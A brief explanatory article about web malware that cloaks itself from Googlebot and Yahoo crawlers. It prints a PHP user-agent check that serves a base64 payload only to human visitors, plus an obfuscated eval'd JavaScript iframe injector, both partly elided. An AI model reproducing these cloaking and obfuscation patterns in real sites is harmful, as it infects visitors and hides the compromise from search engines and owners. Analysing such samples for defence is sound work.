
Malicious scripts learn to hide from googlebot
Google pretty well defines the malicious code on HTML pages, after which the caught website is blacklisted and lowered in search results. Even worse, the infection immediately becomes known to the owner of the site, who receives feedback from users who come from the search engine. All this is very bad for the virus writers business. That's why they came up with a new trick : they started adding encoded code like this to the page:
That is, malware checks if the search engine Google or Yahoo has visited the site, then in this case the malicious code does not appear on the page. For other visitors, a script is displayed.
if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&&
(!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo")))
{
return base64_decode("PHNjcmlwdD5.. ..KS5qb2luKCIiKSk7PC9zY3JpcHQ+");
}
else
{
return "";
}
var bpxDsSbm8='d*%@o*%@c*%@u*%@%@a*%@.. %@t*%@p*%@:*%@/*%@/*%@n*%@i*%@n*%@o*%@"*%@ *%@w*%@i*%@d*%@t*%@h*%@=*%@2*%@.. *%@h*%@e*%@i*%@g*%@h*%@t*%@=*%@2*%@ *%@f*%@r*%@a*%@m*%@e*%@b*%@o*%@r*%@d*%.. @e*%@r*%@=*%@0*%@>*%@<*%@/*%@i*%@f*%@r;eval(bpxDsSbm8.split('*%@').join(""));